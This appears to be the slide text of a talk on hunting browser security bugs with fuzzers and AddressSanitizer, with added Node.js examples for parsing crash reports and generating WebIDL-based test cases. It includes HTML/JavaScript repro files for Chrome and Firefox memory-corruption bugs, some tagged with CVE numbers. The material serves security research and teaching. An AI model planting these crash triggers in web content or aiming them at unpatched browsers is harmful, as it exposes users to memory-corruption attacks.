
Browser Bug Hunting

Memoirs of a last man standing


Atte Kettunen (@attekett)
OUSPG
https://code.google.com/p/ouspg/
Picture by @dominic_sim
Started at OUSPG in summer 2011
First security bug from Chrome 2011-12
Since then
~100 Vulns
~60 Rewards
39 CVEs
Atte Kettunen
Mozilla since 2004
- Sec-High/Critical $3,000
Google since 2010
- Typical security bugs $1,000-$3,133.7
- Possibility for bonus rewards
PoC, exploit, awesomeness
(Microsoft 2013 June 25 - July 25)
Browser Bug Bounty Programs
Easy to get started - Lots of bugs \o/
Helpful vendor security teams and supportive
responses to first bug submissions
Supportive (secretive/competitive)
community of other bounty hunters
Browser Bug Bounty Programs
Use-after-free
DOM
CSS
Rendering
Buffer-overflow
Media formats
Parsers
Decoders
Coordinates
Where the bugs are
AddressSanitizer - global-buffer-overflow - READ of size 2
#0 nsCharTraits<unsigned short>::length()
#1 nsAString_internal::Assign()
.
Repro-file:
<link rel="stylesheet" href="data:text/css;charset=utf-16,p#two%1%7Bbackground-color%65535A%3B%7D%0D%0A"/>
Some bug - CVE-2012-4185 - Firefox
AddressSanitizer - heap-use-after-free - READ of size 2
#0 WebCore::nextBreakablePosition()
#1 ...::RenderBlock::LineBreaker::nextLineBreak()
.
Repro-file:
<html><body>
<ruby>
<q style="column-gap:2;">a
</ruby>
<cite style="word-break: break-all;">a
<q style="text-transform:uppercase;">a
<sup style="text-overflow:ellipsis;">
</body></html>
Some bug - Regression - Chrome
==3213== ERROR: AddressSanitizer heap-buffer-overflow
on address 0x7f50cd6ffcf8 at pc 0x7f50dd159dde bp
0x7fff3e0accd0 sp 0x7fff3e0accc8
READ of size 2 at 0x7f50cd6ffcf8 thread T0
#0 0x7f.de in WebCore::CSSParser::lex(void*) ???:0
#1 0x7f.78 in cssyyparse(void*) ???:0
#2 0x7f.40 in WebCore::CSSParser::parseDeclaration()
.
Repro-file:
<a style=top:-1px>
Some bug - Regression - Chrome
Three golden rules:
1. Stay green - Features
2. Stay green - Competition
3. Stay green - Tools
Hunting for living
1. Stay green - Features
New features are published all the time
New code \o/
Some changes are not highlighted
Minor updates to JavaScript API support etc.
Old bugs fixed
New code \o/
Old features can change
Prefixes disappear (-webkit, -moz),
Features can get disabled
Hunting for living
1. Stay Green - Features
Firefox Aurora - Release note: "Partial support for
Web Audio, targeted at web developers for testing"
(May 17, 2013)
Hunting for living
2. Stay green - Competition
Tools
Different approach -> Different bugs?
Targets
Find new minefields
Platforms
Different code on different platforms
Hunting for living
2. Stay green - Competition
@cevans: "@j00ru has melted polar ice with
his PDF fuzzing on 9k cores."
Hunting for living
3. Stay green - Tools
Instrumentations
New instrumentation -> detect new issues
Build environments
Broken builds @#!#...
Fuzzers
New techniques
Hunting for living
3. Stay green - Tools
<Q>: WTF??? On Chromium startup:
==25254== ERROR: AddressSanitizer: global-buffer-overflow on address
0x000011d3dde5 at pc 0x5ab21a bp 0x7fff00659450 sp 0x7fff00659428
READ of size 10 at 0x000011d3dde5 thread T0
#0 0x5ab219 in __interceptor_memcmp _asan_rtl_
#1 0xa1edc08 in fillInUnixFile .../sqlite/amalgamation/sqlite3.c:28654
#2 0xa1efe7c in unixOpen .../sqlite/amalgamation/sqlite3.c:29294
<A>:
Diff of /trunk/tools/build/scripts/slave/runtest.py:
+ # Avoid aggressive memcmp checks until http://crbug.com/178677 is fixed.
+ os.environ['ASAN_OPTIONS'] = 'strict_memcmp=0'
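Review bot: the second `+` line assigns `os.environ['ASAN_OPTIONS']` outright, so any options the caller already exported for the run (symbolizer path, leak detection and the like) are dropped rather than extended; prefer merging with the colon separator ASan uses, e.g. `os.environ['ASAN_OPTIONS'] = ':'.join(filter(None, [os.environ.get('ASAN_OPTIONS'), 'strict_memcmp=0']))`, and make the comment say that this turns off a real out-of-bounds check for every test in the run until the linked bug is fixed, not only for the startup memcmp.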
Hunting for living
Instrumentation
Fuzzers
Hardware/Infrastructure
Tools
Clang compiler plugin
Adds instrumentation to check memory
access at runtime
Similar to Valgrind
Only 2x slowdown
Created at Google
Used by Google & Mozilla
Linux & OS X
http://www.chromium.org/developers/testing/addresssanitizer
AddressSanitizer
Awesome with use-after-frees
Very good for buffer-overflows and out of bounds access
Good but confused with type confusions
AddressSanitizer
==6==ERROR: AddressSanitizer: heap-use-after-free on address
0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298
READ of size 8 at 0x6070000268d0 thread T0 (chrome)
#0 0x7f845771029e (... /asan-linux-release-209136/chrome+0x96f229e)
#1 0x7f84576aacea (... /asan-linux-release-209136/chrome+0x968ccea)
#2 0x7f8451ce00f3 (... /asan-linux-release-209136/chrome+0x3cc20f3)
.
0x6070000268d0 is located 64 bytes inside of 72-byte region
[0x607000026890,0x6070000268d8)
freed by thread T19 (AudioOutputDevi) here:
#0 0x7f844f58e101 (... /asan-linux-release-209136/chrome+0x1570101)
#1 0x7f845887b5ec (... /asan-linux-release-209136/chrome+0xa85d5ec)
.
AddressSanitizer
==6==ERROR: AddressSanitizer: heap-use-after-free on address
0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298
READ of size 8 at 0x6070000268d0 thread T0 (chrome)
#0 0x7f845771029e in WebCore::WaveShaperDSPKernel::
lazyInitializeOversampling(...) .../WebKit/Source/wtf/OwnPtr.h:138
#1 0x7.a in WebCore::WaveShaperProcessor::setOversample(...) ...
/WebKit/Source/modules/webaudio/WaveShaperProcessor.cpp:70
.
0x6070000268d0 is located 64 bytes inside of 72-byte region
[0x607000026890,0x6070000268d8)
freed by thread T19 (AudioOutputDevi) here:
#0 0x7.1 in operator delete(void*) _asan_rtl_
#1 0x7.c in WebCore::AudioDSPKernelProcessor::uninitialize()
src/third_party/WebKit/Source/wtf/OwnPtrCommon.h:47
.
AddressSanitizer
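Added example, not code from the talk or from NodeFuzz: a Node.js parser that pulls the triage fields out of an ASan report like the one above (error type, access, crash stack, freeing thread and its stack) and derives a bucket key, which is the kind of instrumentation module a harness needs to recognise the "dupes & dupes & dupes" before a human looks. The sample report is a constructed copy of the symbolized report on the slides, and the field names are my own.

```javascript
// Added example, not from the talk or NodeFuzz: pull the fields a harness needs
// for crash bucketing out of an AddressSanitizer report. SAMPLE_REPORT is a
// constructed copy of the symbolized report quoted on the slides.
const SAMPLE_REPORT = `
==6==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000268d0 at pc 0x7f845771029f bp 0x7fffc7eea2a0 sp 0x7fffc7eea298
READ of size 8 at 0x6070000268d0 thread T0 (chrome)
    #0 0x7f845771029e in WebCore::WaveShaperDSPKernel::lazyInitializeOversampling(...) .../WebKit/Source/wtf/OwnPtr.h:138
    #1 0x7f84576aacea in WebCore::WaveShaperProcessor::setOversample(...) .../WebKit/Source/modules/webaudio/WaveShaperProcessor.cpp:70
0x6070000268d0 is located 64 bytes inside of 72-byte region [0x607000026890,0x6070000268d8)
freed by thread T19 (AudioOutputDevi) here:
    #0 0x7f844f58e101 in operator delete(void*) _asan_rtl_
    #1 0x7f845887b5ec in WebCore::AudioDSPKernelProcessor::uninitialize() src/third_party/WebKit/Source/wtf/OwnPtrCommon.h:47
`;
// Parse the header, the access line and every "#N 0xADDR [in SYMBOL [FILE:LINE]]"
// frame, assigning frames to the crash, free or allocation stack by section.
// The colon after "AddressSanitizer" is optional because older reports omit it.
function parseAsanReport(text) {
  const head = /ERROR: AddressSanitizer:? ([\w-]+) on address (0x[0-9a-f]+)/.exec(text);
  if (!head) return null;                      // not an ASan report at all
  const acc = /(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread (T\d+)/.exec(text) || [];
  const report = { type: head[1], address: head[2], mode: acc[1] || null,
    size: acc[2] ? Number(acc[2]) : null, thread: acc[3] || null,
    freeThread: null, stacks: { crash: [], free: [], alloc: [] } };
  let cur = 'crash';
  for (const line of text.split('\n')) {
    const sec = /^(freed|previously allocated) by thread (T\d+)/.exec(line);
    if (sec) {
      cur = sec[1] === 'freed' ? 'free' : 'alloc';
      if (cur === 'free') report.freeThread = sec[2];
      continue;
    }
    const f = /^\s*#(\d+)\s+0x[0-9a-f]+\s*(.*)$/.exec(line);
    if (!f) continue;
    let symbol = null, loc = null;
    if (f[2].startsWith('in ')) {                // unsymbolized frames have no "in"
      const lm = /^in (.*?)(?: (\S+:\d+))?$/.exec(f[2]);
      symbol = lm[1]; loc = lm[2] || null;
    }
    report.stacks[cur].push({ idx: Number(f[1]), symbol, loc });
  }
  return report;
}
// Bucket key for dupe detection: error type plus the top two symbolized crash
// frames with argument lists stripped; addresses and offsets vary per run.
function bucketKey(report) {
  const top = report.stacks.crash.filter(f => f.symbol).slice(0, 2)
    .map(f => f.symbol.replace(/\(.*\)$/, ''));
  return [report.type, ...top].join('|');
}
```

Two reports from different runs of the same test case produce the same key even though every address differs, which is what lets a harness count them as one bug.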
Used to instrument binaries
Redirects heap-related calls to own runtime library
Currently only heap-instrumentation
Chrome/Chromium only atm.
About 3x Slowdown
Windows only
https://code.google.com/p/sawbuck/wiki/SyzyASanDesignDocument
SyzyASan
SyzyASAN error: heap-buffer-overflow on address
0x0379D1A7 (stack_id=0x44CB69D7)
READ of size 8 at 0x0379D000
#0 0x000068ef23be in (unknown)
#1 0x000068f387f4 in (unknown)
#2 0x000068eeb486 in (unknown)
#3 0x000068e8add7 in (unknown)
.
.
.
SyzyASan
Bad access information:
+0x000 alloc_stack : [62] 0x0f999970 Void
+0x0f8 alloc_stack_size : 0x3c '<'
+0x0fc alloc_tid : 0x14a8
+0x100 free_stack : [62] (null)
+0x1f8 free_stack_size : 0 ''
+0x1fc free_tid : 0
+0x200 error_type : 3 ( HEAP_BUFFER_OVERFLOW )
+0x204 access_mode : 0 ( ASAN_READ_ACCESS )
+0x208 access_size : 8
+0x20c shadow_info : [128] "06499E3F is 23 bytes
beyond 384-byte block [06499CA8,06499E28)."
+0x290 microseconds_since_free : 0
SyzyASan
Crash stack:
chrome_dll!SkOpSegment::addTCoincident+0x18e
chrome_dll!SkOpContour::calcCoincidentWinding+0x9f
chrome_dll!CoincidenceCheck+0x3c
chrome_dll!Op+0x26a
.
Allocation stack:
asan_rtl!asan_HeapAlloc+0x48
chrome_dll!malloc+0x17
chrome_dll!realloc+0x15
chrome_dll!SkOpSegment::addT+0x9b
chrome_dll!AddIntersectTs+0xceb
chrome_dll!Op+0x244
SyzyASan
Heap allocation monitoring for Windows
No feedback - Only crash :(
Works on Chrome/Chromium
env: CHROME_ALLOCATOR="winheap"
Enable Chrome error reporting ->
minidumps
Firewall Chrome (No free 0-days for Google ;) )
Debugging tools x86
http://www.chromium.org/developers/testing/page-heap-for-chrome
Page-Heap
ExceptionAddress: 564a0cd7 (chrome_..!WebCore::
WaveShaperDSPKernel::lazyInitializeOversampling+0x0...06)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 27261fe4
Attempt to read from address 27261fe4
.
STACK_TEXT:
chrome_...!WebCore::WaveShaperDSPKernel::
lazyInitializeOversampling+0x6 [...
\webkit\source\modules\webaudio\waveshaperdspkernel.cpp @ 53]
chrome_...!WebCore::WaveShaperProcessor::setOversample+0x29
.
APPLICATION_FAULT_INVALID_POINTER_READ_chrome!WebCore::
WaveShaperDSPKernel::lazyInitializeOversampling+6
Dump-analysis
Dumb fuzzing
Yes, still works
Yes, you can still find bugs with bit-flipping of
image-files
Smart fuzzing
Finds bugs fast but runs out of bugs faster. :(
Fuzzers
Dumb fuzzing
Radamsa || Surku \o/
https://code.google.com/p/ouspg/
Mutate old repros
( find ./src/ -type d -name '*crashtest*' | xargs ls; )
Collect winnings
Fuzzers
Smart fuzzing
W3C/MDN(/MSDN)
Again stay green
Most of the JavaScript APIs in
browsers are really similar
Some of the public tools have the logic
in them already
W3C spec + grep + sed = $$$
Fuzzers
Smart fuzzing
WebAudio API - PannerNode - Specification
interface PannerNode : AudioNode {
void setPosition(double x, double y, double z);
void setOrientation(double x, double y, double z);
void setVelocity(double x, double y, double z);
attribute double refDistance;
attribute double maxDistance;
attribute double rolloffFactor;
};
Fuzzers
Smart fuzzing
2D Canvas API - Specification
// rects
void clearRect(unrestricted double x, unrestricted double
y, unrestricted double w, unrestricted double h);
void fillRect(unrestricted double x, unrestricted double y,
unrestricted double w, unrestricted double h);
// shadows
attribute unrestricted double shadowOffsetX; // (default 0)
attribute unrestricted double shadowOffsetY; // (default 0)
attribute unrestricted double shadowBlur; // (default 0)
Fuzzers
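Added example, not code from the talk or from NodeFuzz, of the "W3C spec + grep + sed" idea in Node.js: a small regex parser for the flat WebIDL shown on the two slides above, and a generator that turns the parsed PannerNode interface into try/catch-wrapped test cases shaped like the PoCs later in the talk, for running against one's own ASan build. The IDL text is a constructed copy of the PannerNode slide, the boundary values and the seeded generator are my own choices, and createPanner() is assumed to be the factory for this interface.

```javascript
// Added example, not NodeFuzz's own code: a WebIDL-driven test case generator
// in the spirit of "W3C spec + grep + sed". It parses the PannerNode interface
// quoted on the slides (constructed copy below) and emits try/catch-wrapped
// calls shaped like the PoCs in the talk, with boundary doubles as inputs.
const PANNER_IDL = `
interface PannerNode : AudioNode {
  void setPosition(double x, double y, double z);
  void setOrientation(double x, double y, double z);
  void setVelocity(double x, double y, double z);
  attribute double refDistance;
  attribute double maxDistance;
  attribute double rolloffFactor;
};`;
// Values worth trying at the edges of a double-typed API.
const EDGE_DOUBLES = ['0', '-0', '1', '-1', '1e308', '-1e308', '5e-324', 'NaN',
  'Infinity', '-Infinity', '2147483648', '4294967296'];
// Regex parser for the flat IDL subset on the slides: void operations with
// typed parameters and (unrestricted) attributes; keeps parameter types only.
function parseInterface(idl) {
  const name = /interface\s+(\w+)/.exec(idl)[1];
  const ops = [...idl.matchAll(/void\s+(\w+)\(([^)]*)\);/g)].map(m => ({
    name: m[1],
    params: m[2].split(',').filter(p => p.trim())
      .map(p => p.trim().replace(/^unrestricted\s+/, '').split(/\s+/)[0]),
  }));
  const attrs = [...idl.matchAll(/attribute\s+(?:unrestricted\s+)?(\w+)\s+(\w+);/g)]
    .map(m => ({ type: m[1], name: m[2] }));
  return { name, ops, attrs };
}
// Seeded LCG so a crashing case can be regenerated from its seed alone.
function makeRng(seed) {
  let s = seed >>> 0;
  return () => (s = (Math.imul(s, 1664525) + 1013904223) >>> 0) / 4294967296;
}
const pick = (rng, arr) => arr[Math.floor(rng() * arr.length)];
// One case: create the node (createPanner() assumed as the WebKit-era factory),
// then `count` random calls or attribute writes, each wrapped in try/catch so
// an exception never ends the case early; the result is a <script> body.
function generateCase(iface, seed, count) {
  const rng = makeRng(seed), v = 'node0';
  const lines = ['try{var ctx=new webkitAudioContext()}catch(e){}',
                 `try{var ${v}=ctx.createPanner()}catch(e){}`];
  for (let i = 0; i < count; i++) {
    const op = pick(rng, iface.ops), a = pick(rng, iface.attrs);
    lines.push(rng() < 0.5
      ? `try{${v}.${op.name}(${op.params.map(() => pick(rng, EDGE_DOUBLES)).join(',')})}catch(e){}`
      : `try{${v}.${a.name}=${pick(rng, EDGE_DOUBLES)}}catch(e){}`);
  }
  return lines.join('\n');
}
```

The same parser accepts the 2D Canvas fragment on the previous slide, since it only strips the unrestricted qualifier and keeps the type, so one generator covers both specs.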
Individuals:
Physical machines -> sysadmining <3
SSD <3
RAM++
Vicious cycle of
Bug->Bounty->New HW->Bug->Bounty...
Hardware/Infrastructure
8x Dual Core CPU, 2GB ram, USB-stick,
aka. Badgers
OUSPG - 2011
University HW:
Badgers
6x Quad core AMD A10, 16GB ram, SSD
6x Dual Dual Core AMD antique, 8GB, 10k rpm
BYOD:
4x Quad core i7-3770K, 16GB ram, SSD
And additional 30+ cores misc hardware with
133.7+ GB of ram and bunch of SSDs
OUSPG - 2013
ClusterFuzz aka. CF
Google fuzzing cluster
2012 -
6000 Chrome instances
50m+ test cases per day
Plans for quadrupling at that time
ASAN, multiple fuzzers, minimization,
regression ranges, verify fixes, dupes &
dupes & dupes...
Hardware/Infrastructure
cluster-fuzz is a soulless bug hunting machine.
It has no want or need for your gratitude. It
lives only to feed on bugs.
ClusterFuzz
12 machines running 24/7
~50 cores, ~133.7GB of RAM
approx. 20m test cases per day
19 file-formats
git, scp, auto-update, auto-minimize
Radamsa and ...
My stuff
Browser fuzzer harness
Written in JavaScript ( Node.js )
Linux, Windows, OS X
Test case generators and instrumentations
loaded as modules
Uses WebSockets for test case injection to
browser
Stable - https://code.google.com/p/ouspg/downloads/list
Trunkish - https://github.com/attekett/NodeFuzz
NodeFuzz
Requirements: Google Chrome installed
$ sudo apt-get install nodejs
$ git clone https://github.com/attekett/NodeFuzz.git
$ cd NodeFuzz
$ npm install
$ vim config.js #Optional
$ node nodefuzz.js
NodeFuzz - Setup - Ubuntu
Fairly new JS API (Chrome 2011, FF 2013)
"The API has been designed to allow modular
routing.(UAF) Basic audio operations are performed
by audio nodes that are linked together to form an
audio routing graphs.(UAF/BOF) Inside a same
context, several sources are supported, with different
kind of channel layout.(UAF/BOF) This modular
design allows for great flexibility and for the creation
of complex audio functions and of dynamic effects.
(BOF)" - MDN
NodeFuzz - module - WebAudio
Bugs found:
Chrome - 4 UAF, 3 BOF
Firefox - 1 UAF, 8 BOF
NodeFuzz - module - WebAudio
CVE-2013-0879 - Chrome - BOF
<script>
try{var context= new webkitAudioContext()}catch(e){}
try{var oscillator= context.createOscillator()}catch(e){}
try{oscillator.start(0.701,0.7,0.7)}catch(e){}
setInterval(function(){
try{oscillator.connect(context.destination);}catch(e){}
},4)
try{oscillator.stop(0.70)}catch(e){}
</script>
NodeFuzz - module - WebAudio
CVE-2013-2845 - Chrome - UAF
<script>
var Context0= new webkitAudioContext()
var Analyser0=Context0.createAnalyser();
var WaveShaper0=Context0.createWaveShaper();
var Convolver3=Context0.createConvolver();
Analyser0.connect(WaveShaper0);
WaveShaper0.connect(Context0.destination);
Convolver3.connect(Analyser0);
setInterval(function(){
Analyser0.disconnect();
},4)
</script>
NodeFuzz - module - WebAudio
DEMO!!!
&&
Q&A
